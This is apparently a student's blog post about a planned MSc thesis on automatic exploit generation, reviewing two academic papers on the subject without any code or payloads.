Auto-generating exploits
So I’ve agreed on a general topic for my Msc thesis with my supervisor, the basic idea being to take a known vulnerability and from that to generate a shellcode executing exploit. Obviously there are a bucket load of problems that this summary glosses over but I intend to start out fairly basic with a vanilla stack overflow and work my way towards more interesting vulnerabilities. Given the time I’d also like to deal with protection mechanisms e.g. ASLR, DEP etc.
There doesn’t seem to be any published research that actually deals with this topic exactly. [1] describes a mechanism for specifing API level exploits, that is exploits that are a result of a sequence of API calls that results in some safety property being violated. They also treat printf like an API and describe how to automatically generating format strings that read/write arbitrary values and locations. The main issue with their approach is that it only deals with format string exploits, which are fairly trivial, and it requires manual reverse engineering to determine certain paramaters required in the exploit (like the buffer length available).
The only other paper I have found is [2], which describes a technique for automatically generating exploits based on a patched version of a program and the original. This is actually pretty cool although their definition of an ‘exploit’ is different to mine. They consider an exploit to be any violation of a certain property, such as the return address of a stack frame being modified. Due to this definition what they actual generate are denial of service conditions as opposed to exploits that result in code execution*.
The opinion of a few people, and one that I can see the reasoning behind, is that automatically generating exploits for the majority of vulnerabilities just isn’t feasible due to the level of customisation required. We’ll see….
[1] Automatic Discovery of API-Level Exploits, V. Ganapathy
[2] Automatic Patch-Based Exploit Generation is Possible: Techniques and Implications, D. Brumley
* After reading the paper a bit more closely (doh!) and talking with the authors, it turns out they did actually generate control hijacking exploits for some vulnerabilities. Apparently not much research was put into this particular part of the project though so there’s still plenty to look at.